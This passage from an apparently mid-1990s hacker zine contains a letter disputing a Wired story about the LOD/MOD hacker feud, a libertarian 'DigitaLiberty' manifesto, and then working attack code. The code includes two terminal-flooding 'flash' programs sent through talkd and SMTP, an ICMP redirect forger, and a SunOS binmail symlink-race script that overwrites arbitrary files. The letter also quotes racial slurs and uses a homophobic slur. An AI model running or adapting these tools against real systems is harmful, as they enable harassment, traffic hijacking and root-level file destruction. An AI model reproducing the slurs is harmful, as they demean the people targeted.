+ to 10 USENET newsgroups, put on the Wired forums on AOL, Mindvox and the Well,
+ sent in email to every user of wired.com, faxed to all 7 fax machines at
+ Wired and sent to them registered mail.  Probably more than 5 times
+ Wired's paid circulation saw it, so they HAD to print it or look foolish.
+ At least, that's my take on it.  Just for overkill, here it is again.]
+
+To Whom It May Concern:
+
+I am writing this under the assumption that the editorial staff at
+Wired will "forget" to print it in the upcoming issue, so I am
+also posting it on every relevant newsgroup and online discussion forum
+that I can think of.
+
+When I first read your piece "Gang War In Cyberspace" I nearly choked on
+my own stomach bile.  The whole tone of this piece was so far removed from
+reality that I found myself questioning what color the sky must be
+in Wired's universe.  Not that I've come to expect any better from Wired.
+Your magazine, which could have had the potential to actually do something,
+has become a parody...a politically correct art-school project that
+consistently falls short of telling the whole story or making a solid point.
+(Just another example of Kapor-Kash that ends up letting everyone down.)
+
+I did however expect more from Josh Quittner.
+
+I find it interesting that so much emphasis can be placed on an issue of
+supposed racial slurs as the focus of an imaginary "gang war," especially
+so many years after the fact.
+
+It's also interesting to me that people keep overlooking the fact that one of
+the first few members of our own little Legion of Doom was black (Paul
+Muad'dib.)  Maybe if he had not died a few years back that wouldn't be
+so quickly forgotten.  (Not that it makes a BIT of difference what color
+a hacker is as long as he or she has a brain and a modem, or these days
+at least a modem.)
+
+I also find it interesting that a magazine can so easily implicate someone
+as the originator of the so-called "fighting words" that allegedly sparked
+this online-battle, without even giving a second thought as to the damage
+that this may do to the person so named.  One would think that a magazine
+would have more journalistic integrity than that (but then again, this IS
+Wired, and political correctness sells magazines and satisfies advertisers.)
+Thankfully, I'll only have to endure one month of the "Gee Chris, did you
+know you were a racist redneck?" phone calls.
+
+It's further odd that someone characterized as so sensitive to insults
+allegedly uttered on a party-line could have kept the company he did.
+Strangely enough, Quittner left out all mention of the MOD member who called
+himself "SuperNigger."  Surely, John Lee must have taken umbrage to an
+upper-middle class man of Hebrew descent so shamefully mocking him and
+his entire race, wouldn't he?   Certainly he wouldn't associate in any way
+with someone like that...especially be in the same group with, hang out with,
+and work on hacking projects with, would he?
+
+Please, of course he would, and he did.  (And perhaps he still does...)
+
+The whole "racial issue" was a NON-ISSUE.  However, such things make
+exciting copy and garner many column inches so keep being rehashed.  In
+fact, several years back when the issue first came up, the statement was
+cited as being either "Hang up, you nigger," or "Hey, SuperNigger," but
+no one was sure which was actually said.  Funny how the wording changes
+to fit the slant of the "journalist" over time, isn't it?
+
+I wish I could say for certain which was actually spoken, but alas, I was not
+privy to such things.  Despite the hobby I supposedly so enjoyed according
+to Quittner, "doing conference bridges," I abhorred the things.  We used to
+refer to them as "Multi-Loser Youps" (multi-user loops) and called their
+denizens "Bridge Bunnies."  The bridge referred to in the story was
+popularized by the callers of the 5A BBS in Houston, Texas.  (A bulletin board,
+that I never even got the chance to call, as I had recently been raided by
+the Secret Service and had no computer.)  Many people from Texas did call
+the BBS, however, and subsequently used the bridge, but so did people from
+Florida, Arizona, Michigan, New York and Louisiana.  And as numbers do in the
+underground, word of a new place to hang out caused it to propagate rapidly.
+
+To make any implications that such things were strictly a New York versus Texas
+issue is ludicrous, and again simply goes to show that a "journalist" was
+looking for more points to add to his (or her) particular angle.
+
+This is not to say that I did not have problems with any of the people
+who were in MOD.  At the time I still harbored strong feelings towards
+Phiber Optik for the NYNEX-Infopath swindle, but that was about it.
+And that was YEARS ago.  (Even I don't harbor a grudge that long.)
+Even the dozen or so annoying phone calls I received in late 1990 and
+early 1991 did little to evoke "a declaration of war."  Like many people,
+I know how to forward my calls, or unplug the phone.  Amazing how technology
+works, isn't it?
+
+Those prank calls also had about as much to do with the formation of Comsec as
+bubble-gum had to do with the discovery of nuclear fission.  (I'm sure if you
+really put some brain power to it, and consulted Robert Anton Wilson,
+you could find some relationships.)  At the risk of sounding glib, we
+could have cared less about hackers at Comsec.  If there were no hackers,
+or computer criminals, there would be no need for computer security
+consultants.  Besides, hackers account for so little in the real picture
+of computer crime, that their existence is more annoyance than something
+to actually fear.
+
+However, when those same hackers crossed the line and began tapping our
+phone lines, we were more than glad to go after them.  This is one of my only
+rules of action:  do whatever you want to anyone else, but mess with me and
+my livelihood and I will devote every ounce of my being to paying you back.
+That is exactly what we did.
+
+This is not to say that we were the only people from the computer underground
+who went to various law enforcement agencies with information about
+MOD and their antics.  In fact, the number of hackers who did was staggering,
+especially when you consider the usual anarchy of the underground.  None of
+these other people ever get mentioned and those of us at Comsec always take
+the lead role as the "narks," but we were far from alone.  MOD managed to
+alienate the vast majority of the computer underground, and people reacted.
+
+All in all, both in this piece, and in the book itself, "MOD, The Gang That
+Ruled Cyberspace," Quittner has managed to paint a far too apologetic piece
+about a group of people who cared so very little about the networks they
+played in and the people who live there.  In the last 15 years that I've
+been skulking around online, people in the community have always tended
+to treat each other and the computers systems they voyeured with a great deal
+of care and respect.  MOD was one of the first true examples of a groupthink
+exercise in hacker sociopathy.  Selling long distance codes, selling credit
+card numbers, destroying systems and harassing innocent people is not
+acceptable behavior among ANY group, even the computer underground.
+
+There have always been ego flares and group rivalries in the underground, and
+there always will be.  The Legion of Doom itself was FOUNDED because of a
+spat between its founder (Lex Luthor) and members of a group called The Knights
+of Shadow.  These rivalries keep things interesting, and keep the community
+moving forward, always seeking the newest bit of information in a series
+of healthy one-upsmanship.  MOD was different.  They took things too far
+against everyone, not just against two people in Texas.
+
+I certainly don't condemn everyone in the group.  I don't even know
+a number of them (electronically or otherwise.)  I honestly believe
+that Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed while
+the group's two biggest criminals, Julio Fernandez (Outlaw) and Allen Wilson
+(Wing), rolled over on everyone else and walked away free and clear.  This is
+repulsive when you find out that Wing in particular has gone on to be
+implicated in more damage to the Internet (as Posse and ILF) than anyone in
+the history of the computing.  This I find truly disgusting, and hope that
+the Secret Service are proud of themselves.
+
+Imagine if I wrote a piece about the terrible treatment of a poor prisoner
+in Wisconsin who was bludgeoned to death by other inmates while guards
+looked away.  Imagine if I tried to explain the fact that poor Jeff Dahmer was
+provoked to murder and cannibalism by the mocking of adolescent boys who teased
+and called him a faggot.  How would you feel if I tried to convince you that we
+should look upon him with pity and think of him as a misunderstood political
+prisoner?  You would probably feel about how I do about Quittner's story.
+
+'Hacker' can just as easily be applied to "journalists" too, and with this
+piece Quittner has joined the Hack Journalist Hall of Fame, taking his
+place right next to Richard Sandza.
+
+Quittner did get a few things right.  I do have a big cat named Spud, I do
+work at a computer company and I do sell fantastic t-shirts.  Buy some.
+
+With Love,
+
+Chris Goggans
+aka Erik Bloodaxe
+
+phrack@well.com
+
+------------------------------------------------------------------------------
+
+From: DigitaLiberty@phantom.com
+
+Subject: Announcing - The DigitaLiberty Forum
+
+PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT
+
+Friends of Liberty,
+
+It is becoming increasingly apparent that the arrival of cyberspace is
+destined to engender a fundamental discontinuity in the course of human
+relations.  This is a source of great optimism and opportunity for those of
+us who believe in freedom.
+
+Many of you who participate in the lively debates that take place in these
+forums have seen a number of activist organizations spring up claiming  to
+represent the cause of freedom.  And if you are like me you have cheered
+these groups on only to watch them get bogged down in a quagmire of
+realpolitics.  
+
+It is a sad fact that the beast in Washington has evolved into a
+self-perpetuating engine expert at co-opting the principles of even the most
+ardent reformers.  Slowly but surely all those who engage the system are
+ultimately absorbed into the mainstream miasma of majoritarianism.  For
+example, what can be more discouraging than watching an organization that
+started out as a civil liberties group shift its focus to creating new forms
+of government entitlements while endorsing intrusive wiretap legislation
+because they didn't want to jeopardize their influence and prestige amongst
+the Washington power elite?
+
+Some of us believe we can seek ultimate redress at the polls.  Many pundits
+have declared our recent national elections a watershed in politics, a
+turning point that represents the high water mark of big government.
+ Nonsense.  The names have changed, the chairs have been rearranged, but the
+game remains the same.  The so-called "choices" we are presented with are
+false, hardly better than the mock one-party elections held by failed
+totalitarian regimes.  There must be a better way.
+
+I would like to announce the formation of a new group - DigitaLiberty - that
+has chosen a different path.  We intend to bypass the existing political
+process.  We reject consensus building based on the calculus of compromise.
+ Instead we plan to leave the past behind, much as our pioneering forefathers
+did when they set out to settle new lands.  It is our mission to create the
+basis for a different kind of society.  If you would like to join us I invite
+you to read the information below.
+
+Yours in freedom,
+
+
+
+Bill Frezza
+Co-founder, DigitaLiberty
+December 1994
+
+
+
+***  What is DigitaLiberty?
+
+DigitaLiberty is an advocacy group dedicated to the principled defense of
+freedom in cyberspace.  We intend to conduct this defense not by engaging in
+traditional power politics but by setting an active, persuasive example -
+creating tangible opportunities for others to join us as we construct new
+global communities.  
+
+We believe deeply in free markets and free minds and are convinced that we
+can construct a domain in which the uncoerced choices of individuals supplant
+the social compact politics of the tyranny of the majority. 
+
+***  Is DigitaLiberty a political party or a lobbying group?
+
+Neither.  
+
+DigitaLiberty does not seek to educate or influence politicians in the hope
+of obtaining legislation favorable to our constituents.  We plan to make
+politicians and legislators irrelevant to the future of network based
+commerce, education, leisure, and social intercourse.
+
+DigitaLiberty does not seek to persuade a majority of the electorate to adopt
+views which can then be forced upon the minority.  We hope to make
+majoritarianism irrelevant.  We invite only like minded individuals to help
+us build the future according to our uncompromised shared values.  
+
+
+*** What do you hope to accomplish?
+
+DigitaLiberty is not hopeful that widespread freedom will come to the
+physical world, at least not in our lifetime.  Too many constituencies depend
+upon the largess and redistributive power of national governments and
+therefore oppose freedom and the individual responsibility it entails.  But
+we do believe that liberty can and will prevail in the virtual domains we are
+building on the net and that national governments will be powerless to stop
+us.  We believe that cyberspace will transcend national borders, national
+cultures, and national economies.  We believe that no one will hold
+sovereignty over this new realm because coercive force is impotent in
+cyberspace.
+
+In keeping with the self-organizing nature of on-line societies we believe we
+will chose to invent new institutions to serve our varied economic and social
+purposes.  DigitaLiberty intends to be in the forefront of the discovery and
+construction of these institutions.  
+
+***  But what about the construction of the "Information Superhighway"?
+
+The fabric of cyberspace is rapidly being built by all manner of entities
+espousing the full range of political and economic philosophies.   While
+political activity can certainly accelerate or retard the growth of the net
+in various places and times it cannot stop it nor can it effectively control
+how the net will be used.  
+
+Our focus is not on the institutions that can and will impact the building of
+the physical "information highway" but on those that will shape life on the
+net as an ever increasing portion of our productive activities move there.
+
+***  What makes you think cyberspace will be so different?
+
+The United States of America was the only country in history ever to be built
+upon an idea.  Unfortunately, this idea was lost as we slowly traded away our
+liberties in exchange for the false promise of security.
+
+DigitaLiberty believes that technology can set us free.  The economies of the
+developed world are now making a major transition from an industrial base to
+an information base.  As they do, the science of cryptology will finally and
+forever guarantee the unbreachable right of privacy, protecting individuals,
+groups, and corporations from the prying eyes and grasping hands of
+sovereigns.  We will all be free to conduct our lives, and most importantly
+our economic relations, as we each see fit.  
+
+Cyberspace is also infinitely extensible.   There will be no brutal
+competition for lebensraum.  Multiple virtual communities can exist side by
+side and without destructive conflict, each organized according to the
+principles of their members.  We seek only to build one such community, a
+community based on individual liberty.  Others are free to build communities
+based on other principles, even diametrically opposed principles.  But they
+must do so without our coerced assistance.
+
+Effective communities will thrive and grow.  Dysfunctional communities will
+wither and die.  And for the first time in human history, rapacious societies
+will no longer have the power to make war on their neighbors nor can bankrupt
+communities take their neighbors down with them.  
+
+***  What does this have to do with my real life?  I can't eat data.  I don't
+live in a computer.
+
+Yes, but imagine the ultimate impact of mankind's transition from an agrarian
+economy to an industrial economy to an information economy.  Our founding
+fathers would have consider anyone insane who predicted that a nation of 250
+million could feed itself with fewer than 3% of its citizens involved in
+agriculture.  Similarly, economists and politicians trapped in the policies
+of the past lament our move from a manufacturing economy to a knowledge
+worker and service based economy.  We see this as a cause to rejoice.
+
+The day will come when fewer than 5% of the citizens of a nation of 1 billion
+will be involved in manufacturing - if we still bother calling geographically
+defined entities "nations".  What will the rest of us be doing?  We will be
+providing each other with an exploding array of services and we will be
+creating, consuming, and exchanging information.  Most of this will occur
+entirely within or be mediated at least in part by our activities in
+cyberspace.  
+
+Many of us will earn a very good living on the net.  Our race, our religion,
+our gender, our age, our physical appearance and limitations will all be
+irrelevant and undetectable.  Hard working individuals from underdeveloped
+nations who in the past might have been forced to emigrate in search of
+economic freedom and opportunity can now build productive lives in
+cyberspace.  And much if not all of the wealth we create that we do not
+transform into visible physical assets will be ours to keep and use, beyond
+the grasp of sovereigns.  
+
+*** What is the purpose of this forum?
+
+The DigitaLiberty Forum is a place where like minded individuals can share
+their views, observations, and strategies related to the development of
+virtual communities based on freedom.  It is a place where people can
+exchange information and advice about how they have developed
+extra-territorial business and social relationships  - away from the
+influence and outside the jurisdiction of governments.  It is a forum for the
+posting of essays, questions, and ideas on the topic of liberty.  It is a
+place where we can meet and debate the forms that our  new institutions might
+take and discuss the practical problems and responsibilities that freedom
+entail.
+
+In time as our technology matures some of us will move on to more ambitious
+projects, launch other programs, and begin our virtual migration from the
+swamp of coerced collectivism.  Best of all, there will be no need to
+physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'.  We
+can all participate in this exodus without hastily quitting our jobs or
+disrupting our lives.  And as a larger and larger portion of our economic and
+social activities move onto the net we will create a new society, open to all
+with the will to enter.  This new world will be interleaved with the physical
+world in which we now live and yet will be separate.  And free.
+
+Join us as we begin the journey.
+
+*** Who can join DigitaLiberty?
+
+The DigitaLiberty Forum is open to anyone that can honestly answer yes to the
+following two questions:
+
+1)  I renounce the use of coercive force as a tool of social or economic
+policy.
+
+2)  I do not derive the majority of my income from funds taken from
+taxpayers.
+
+*** How do I join DigitaLiberty?
+
+If you qualify, send a message to DigitaLiberty-request@phantom.com with the
+words "SUBSCRIBE" in the subject line and the message body as follows
+
+SUBSCRIBE DigitaLiberty <your name>
+
+And welcome to the future.
+
+###
+
+------------------------------------------------------------------------------
+/* flash3.c */
+
+/* 
+   Modified from the original by Vassago. Superflash mods unknown.
+   Try the PhoEniX FTP Site: wentz21.reslife.okstate.edu in /pub.
+*/
+
+/* 
+    This little program is intended to quickly mess up a user's
+    terminal by issuing a talk request to that person and sending
+    vt100 escape characters that force the user to logout or kill
+    his/her xterm in order to regain a sane view of the text.
+    It the user's message mode is set to off (mesg n) he/she will
+    be unharmed. 
+
+    Try compiling with: gcc -o flash flash3.c
+
+    Usage: flash user@host [<level>]
+   
+    Level is either the number or the word for these:
+	  1)  BASIC  - Old flash, no zmodem. 
+	  2)  ZMODEM - Old with ZModem.
+	  3)  KILLER - 99 ZModem flashes. 
+*/
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <strings.h>
+#include <string.h>
+#include <ctype.h>
+
+#define BASIC  1
+#define ZMODEM 2
+#define KILLER 3
+
+#define FIRST "\033(0\033#8" 
+#define SECOND "\033[1;3r"
+#define THIRD  "\033[1;5m\033(0"
+#define FOURTH "**\030B00"
+#define FIFTH  "\033**EMSI_IRQ8E08"
+
+/* Comment this to remove the debugging message... */
+#define INFOMESSAGE
+
+/* this should really be in an include file..  */
+
+#define OLD_NAME_SIZE 9
+#define NAME_SIZE    12
+#define TTY_SIZE     16 
+typedef struct {
+	char    type;
+	char    l_name[OLD_NAME_SIZE];
+	char    r_name[OLD_NAME_SIZE];
+	char    filler;
+	u_long  id_num;
+	u_long  pid;
+	char    r_tty[TTY_SIZE];
+	struct  sockaddr_in addr;
+	struct  sockaddr_in ctl_addr;
+} OLD_MSG;
+
+typedef struct {
+	u_char  vers;
+	char    type;
+	u_short filler;
+	u_long  id_num;
+	struct  sockaddr_in addr;
+	struct  sockaddr_in ctl_addr;
+	long    pid;
+	char    l_name[NAME_SIZE];
+	char    r_name[NAME_SIZE];
+	char    r_tty[TTY_SIZE];
+} CTL_MSG;
+
+int seed = 0x2837;
+
+#define TALK_VERSION    1               /* protocol version */
+
+/* Types */
+#define LEAVE_INVITE    0
+#define LOOK_UP         1
+#define DELETE          2
+#define ANNOUNCE        3
+
+int     current = 1;    /* current id..  this to avoid duplications */
+
+struct sockaddr_in *getinaddr(char *hostname, u_short port)
+{
+static  struct sockaddr    addr;
+struct  sockaddr_in *address;
+struct  hostent     *host;
+
+address = (struct sockaddr_in *)&addr;
+(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
+/* fill in the easy fields */
+address->sin_family = AF_INET;
+address->sin_port = htons(port);
+/* first, check if the address is an ip address */
+address->sin_addr.s_addr = inet_addr(hostname);
+if ( (int)address->sin_addr.s_addr == -1)
+	{
+	/* it wasn't.. so we try it as a long host name */
+	host = gethostbyname(hostname);
+	if (host)
+		{
+		/* wow.  It's a host name.. set the fields */
+		/* ?? address->sin_family = host->h_addrtype; */
+		bcopy( host->h_addr, (char *)&address->sin_addr,
+			host->h_length);
+		}
+	else
+		{
+		/* oops.. can't find it.. */
+		puts("Flash aborted, could not find address."); 
+		exit(-1);
+		return (struct sockaddr_in *)0;
+		}
+	}
+/* all done. */
+return (struct sockaddr_in *)address;
+}
+
+SendTalkPacket(struct sockaddr_in *target, char *p, int psize) 
+{
+int     s;
+struct sockaddr sample; /* not used.. only to get the size */
+
+s = socket(AF_INET, SOCK_DGRAM, 0);
+sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); 
+} 
+
+
+new_ANNOUNCE(char *hostname, char *remote, char *local)
+{
+CTL_MSG  packet; 
+struct   sockaddr_in  *address;
+
+/* create a packet */
+address = getinaddr(hostname, 666 );  
+address->sin_family = htons(AF_INET); 
+
+bzero( (char *)&packet, sizeof(packet) );
+packet.vers   = TALK_VERSION; 
+packet.type   = ANNOUNCE;   
+packet.pid    = getpid();
+packet.id_num = current;
+bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); 
+bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
+strncpy( packet.l_name, local, NAME_SIZE); 
+strncpy( packet.r_name, remote, NAME_SIZE); 
+strncpy( packet.r_tty, "", 1); 
+
+SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); 
+}
+
+old_ANNOUNCE(char *hostname, char *remote, char *local)
+{
+OLD_MSG  packet;
+struct   sockaddr_in  *address;
+
+/* create a packet */
+address = getinaddr(hostname, 666 );
+address->sin_family = htons(AF_INET);
+
+bzero( (char *)&packet, sizeof(packet) );
+packet.type   = ANNOUNCE;
+packet.pid    = getpid();
+packet.id_num = current;
+bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
+bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
+strncpy( packet.l_name, local, NAME_SIZE);
+strncpy( packet.r_name, remote, NAME_SIZE);
+strncpy( packet.r_tty, "", 1);
+
+SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
+}
+
+int rnd()
+{
+  seed *=0x1243;
+  seed = seed & 0xFFFF;
+  seed +=1;
+  while(seed>10000)seed-=10000;
+  return(seed);
+}
+
+
+pop(char *hostname, char *username, char *flashstring)
+{
+  char newflashstr[80];
+  int e = rnd();
+  sprintf(newflashstr,"%d%s",e,flashstring); 
+  new_ANNOUNCE(hostname, username, newflashstr); 
+  old_ANNOUNCE(hostname, username, newflashstr);
+}    
+
+flash(int type, char *hostname, char *username)
+{
+	 char firestring[10];
+	 int x,y;
+
+	 current=0;
+	 if (type == 3) y = 14;
+	 else y = 1;
+
+	 for(x=0;x<y;x++)    
+	 {
+	current++;
+	pop(hostname, username, FIRST);
+	current++; 
+	pop(hostname, username, SECOND);
+	current++;
+	pop(hostname, username, THIRD); 
+	if(type>1)
+	{
+	  current++;
+	  pop(hostname, username, FOURTH); 
+	  current++;
+	  pop(hostname, username, FIFTH); 
+	  current++;
+	  pop(hostname, username, FOURTH);
+	}
+	current++;
+	pop(hostname, username, FIRST); 
+	 }
+    return(current);
+}
+
+GetType(char *TypeStr)
+{
+	if (strcmp(TypeStr,"basic")==0)
+		return(1);
+	else if (strcmp(TypeStr,"zmodem")==0)
+		return(2);
+	else if (strcmp(TypeStr,"killer")==0)
+		return(3);
+	else if (strcmp(TypeStr,"1")==0)
+		return(1);
+	else if (strcmp(TypeStr,"2")==0)
+		return(2);
+	else if (strcmp(TypeStr,"3")==0)
+		return(3);
+}    
+
+main(int argc, char *argv[])
+{
+	char    *hostname, *username; 
+	int     pid,type,name;
+
+
+	if ( (pid = fork()) == -1)  
+		{
+		perror("fork()");
+		exit(-1);
+		}
+	if ( !pid )
+		{
+		exit(0);
+		}
+	if (argc < 2) { 
+		puts("USAGE: flash user@host [<flash type>]");
+		puts("Types are: 1) basic, 2) zmodem, 3) killer.");
+		puts("Default flash type is zmodem.");
+		exit(5);
+	}
+	if (argc >= 3) {
+		type=GetType(argv[argc-1]);
+		if(type<1||type>3)type=ZMODEM;
+	}
+	else type=ZMODEM;   /* default */
+
+	for(name=1; name<argc-1; name++)
+	{
+	username = argv[name]; 
+	if ( (hostname = (char *)strchr(username, '@')) == NULL )       
+		{
+		puts("Aborted, invalid name.  ");
+		exit(-1);
+		}
+	*hostname = '\0'; 
+	hostname++; 
+
+	if (*username == '~') 
+		username++; 
+#ifdef INFOMESSAGE
+			printf("Sending a type #%d flash to %s@%s. (%d messages)\n",
+			type,username,hostname,
+			flash(type,hostname,username));
+#else
+	flash(type,hostname,username);
+#endif
+	sleep(1);
+	}
+}
+
+
+------------------------------------------------------------------------------
+
+/*
+
+  Mail Flash - (C) 1994 CHA0S All Rights Reserved
+  
+  This is a simple program which demonstrates the problem with certain
+  parts of VT100 emulation.  Previously similar programs made use
+  of talkd, but a user could stop attempts by simply entering
+  "mesg n".  This program sends the "flash" string which will really
+  screw over a terminal in the SUBJECT header of e-mail.  E-Mail readers
+  such as pine show you this before you can decide to even delete the mail!
+  
+  Support has been added to choose your own SMTP server for neat-o hostname
+  spoofing.  (krad!)
+  
+*/  
+
+#include <stdio.h>
+#include <sys/param.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <stdarg.h>
+ 
+void smtp_connect(char *server);
+ 
+int thesock; /* the socket */
+ 
+void smtp_connect(char *server)
+{
+  struct sockaddr_in sin;
+  struct hostent *hp;
+  
+  hp = gethostbyname(server);
+  if (hp==NULL) {
+    printf("Unknown host: %s\n",server);
+    exit(0);
+  }
+  bzero((char*) &sin, sizeof(sin));
+  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
+  sin.sin_family = hp->h_addrtype;
+  sin.sin_port = htons(25);
+  thesock = socket(AF_INET, SOCK_STREAM, 0);
+  connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
+}
+ 
+void main(int argc, char **argv)
+{
+  char buf[1024];
+  
+  if (argc != 4) {
+    printf("usage: mflash smtp_server from to\n");
+    exit(0);
+  }
+  printf("Connecting to SMTP Server %s\n",argv[1]);
+  smtp_connect(argv[1]);
+  printf("Sending Mail Flash To %s\n",argv[3]);
+  sprintf(buf, "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]);
+  send(thesock, buf, strlen(buf), 0);
+  /* I am not sure how to check when this buffer is done being sent.
+     If you are having any problems increase the sleep time below! */
+  printf("Sleeping To Make Sure Data Is Sent ...\n");
+  sleep(3);
+  printf("Done!\n");
+}
+
+------------------------------------------------------------------------------
+
+[Editor's Note:  Does this work?  I don't think so, but a clever hacker might
+ use the code to do something "interesting."  The concept is sound...the
+ delivery needs a bit of tweaking.]
+
+#include <netdb.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netinet/in_systm.h>
+#include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+#include <netinet/tcp.h>
+#include <signal.h>
+#include <errno.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+int 
+resolver(host,saddr)
+  char *host;
+  struct sockaddr_in *saddr;
+{
+  struct hostent *h=gethostbyname(host);
+
+  bzero(saddr,sizeof(struct sockaddr));
+  saddr->sin_family=AF_INET;
+  if (h!=NULL)
+  {
+    saddr->sin_family=h->h_addrtype;
+    bcopy(h->h_addr,(caddr_t)&saddr->sin_addr,h->h_length);
+    return(0);
+  }
+  else
+  {
+    fprintf(stderr,"juju-router: unknown host ``%s''\n",host);
+    return(-1);
+  }
+  return(0);
+}
+
+in_cksum(addr,len)
+  u_short *addr;
+  int len;
+{
+  register int nleft = len;
+  register u_short *w = addr;
+  register int sum = 0;
+  u_short answer = 0;
+
+  /* This function was taking from existing ICMP nuke code and
+     was presumably originally stripped from a ``ping.c'' implementation.
+  */
+
+  while( nleft > 1 )
+  {
+    sum+=*w++;
+    nleft-=2l;
+  }
+  if( nleft == 1 )
+  {
+    *(u_char *)(&answer) = *(u_char *)w;
+    sum+=answer;
+  }
+  sum=(sum>>16)+(sum& 0xffff);
+  sum+=(sum>>16);
+  answer=~sum;
+  return(answer);
+}
+
+int
+icmp_reroute(host,uhost,port,code)
+  char *host, *uhost;
+  int code, port;
+{
+  struct sockaddr_in       name;
+  struct sockaddr          dest,    uspoof;
+  struct icmp              *mp;
+  struct tcphdr            *tp;
+  struct protoent          *proto;
+
+  int    i, s, rc;
+  char   *buf=(char *) malloc(sizeof(struct icmp)+64);
+
+  mp=(struct icmp *) buf;
+
+  if (resolver(host,&dest)<0) return(-1);
+  if (resolver(uhost,&uspoof)<0) return(-1);
+
+  if ((proto=getprotobyname("icmp")==NULL))
+  {
+    fprintf(stderr,"fatal; unable to determine protocol number of ``icmp''\n");
+    return(-1);
+  }
+  
+  if ((s=socket(AF_INET,SOCK_RAW,proto->p_proto))<0) 
+  {
+    perror("opening raw socket");
+    return(-1);
+  }
+  name.sin_family=AF_INET;
+  name.sin_addr.s_addr=INADDR_ANY;
+  name.sin_port=htons(port);
+
+  if ((rc=bind(s,(struct sockaddr *) &name, sizeof(name)))==-1)
+  {
+    fprintf(stderr,"fatal; error binding sockets\n");
+    return(-1);
+  }
+
+  if ((proto=getprotobyname("tcp")==NULL))
+  {
+    fprintf(stderr,"fatal; unable to determine protocol number of ``tcp''\n");
+    return(-1);
+  }
+
+  bzero(mp,sizeof(struct icmp)+64);
+  mp->icmp_type         = ICMP_REDIRECT;
+  mp->icmp_code         = code;
+  mp->icmp_ip.ip_v      = IPVERSION;
+  mp->icmp_ip.ip_hl     = 5;
+  mp->icmp_ip.ip_len    = htons(sizeof(struct ip)+64+20);
+  mp->icmp_ip.ip_p      = IPPROTO_TCP;
+  mp->icmp_ip.ip_src    = ((struct sockaddr_in *)&dest)->sin_addr;
+  mp->icmp_ip.ip_dst    = ((struct sockaddr_in *)&dest)->sin_addr;
+  mp->icmp_gwaddr       = ((struct sockaddr_in *)&uspoof)->sin_addr;
+  mp->icmp_ip.ip_ttl    = 150;
+  mp->icmp_cksum        = 0;
+  tp=(struct tcphdr *)((char *)&mp->icmp_ip+sizeof(struct ip));
+  tp->th_sport          = 23;
+  tp->th_dport          = htons(1499);
+  tp->th_seq            = htonl(0x275624F2);
+  mp->icmp_cksum        = htons(in_cksum(mp,sizeof(struct icmp)+64));
+
+  if ((i=sendto(s,buf,sizeof(struct icmp)+64,0,&dest,sizeof(dest)))<0)
+  {
+    fprintf(stderr,"fatal; error sending forged packet\n");
+    return(-1);
+  }
+  return(0);
+}
+
+void
+main(argc,argv)
+  int argc;
+  char **argv;
+{
+  int i, code;
+
+  if ((argc<4) || (argc>5))
+  {
+    fprintf(stderr,"usage: juju-router target new-destination port code\n");
+    fprintf(stderr,"codes: 0 _REDIRECT_NET    1 _REDIRECT_HOST (default)\n");
+    fprintf(stderr,"       2 _REDIRECT_TOSNET 2 _REDIRECT_TOSHOST\n");  
+    exit(1);
+  }
+
+  printf("juju-router: rerouting dynamically....");
+  if (code!=0 && code!=1 && code!=2 && code!=3) code=0;
+  if (icmp_reroute(argv[1],argv[2],argv[3],code)<0)
+  {
+    printf("failed.\n");
+    exit(1);
+  }
+  printf("succeeded.\n");
+  exit(0);
+}
+
+------------------------------------------------------------------------------
+
+#!/bin/sh
+# tmpmail: overwrite files using binmail
+#
+# Usage: tmpmail to-file
+#
+# (c) [8lgm] 1994, tested under SunOS 4.1.2.
+#
+#
+# Note: Script only works if mail is suid root.
+#       Other vendors may use tmpnam("ma").
+#
+# This vulnerability can be exploited for sgid
+# mail binmails, the only modification would
+# be to predict the pid of the mail process
+# created by sendmail.  This would be 4 forward
+# of the current pid - assuming a 'quiet' system.
+#
+# Will create to-file, or truncate.
+
+PATH=/usr/ucb:/usr/bin:/bin      export PATH
+IFS=" "                          export IFS
+
+PROG="`basename $0`"
+
+# Check args
+if [ $# -ne 1 ]; then
+        echo "Syntax: $PROG to-file"
+        exit 1
+fi
+
+TO_FILE="$1"
+
+# Check we're on SunOS
+if [ "x`uname -s`" != "xSunOS" ]; then
+        echo "Sorry, this only works on SunOS"
+        exit 1
+fi
+
+# Create our racing program!
+
+cat > mailrace.c << 'EOF'
+#include <stdio.h>
+#include <unistd.h>
+
+char path[] = "/tmp/maaXXXX";
+
+main(argc,argv)
+int argc;
+char **argv;
+{
+  int pid;
+  char *trv;
+
+  if (argc != 3) {
+    fprintf(stderr, "Usage: %s pid tofile\n", argv[0]);
+    exit(1);
+  }
+
+  pid = atoi(argv[1]);
+
+/* Stolen from mktemp.c */
+  for (trv = path; *trv; ++trv);          /* extra X's get set to 0's */
+  while (*--trv == 'X') {
+    *trv = (pid % 10) + '0';
+    pid /= 10;
+  }
+
+  symlink("/tmp/ShortSong", path);
+  while(symlink(argv[2], path));
+  exit(0);
+}
+EOF
+cc -o mailrace mailrace.c
+
+# Check we now have mailrace
+if [ ! -x "mailrace" ]; then
+        echo "$PROG: couldnt compile mailrace.c - check it out"
+        exit 1
+fi
+
+# create some input for binmail
+echo localhost $USER > /tmp/BlueRoom.$$
+./mailrace $$ $TO_FILE &
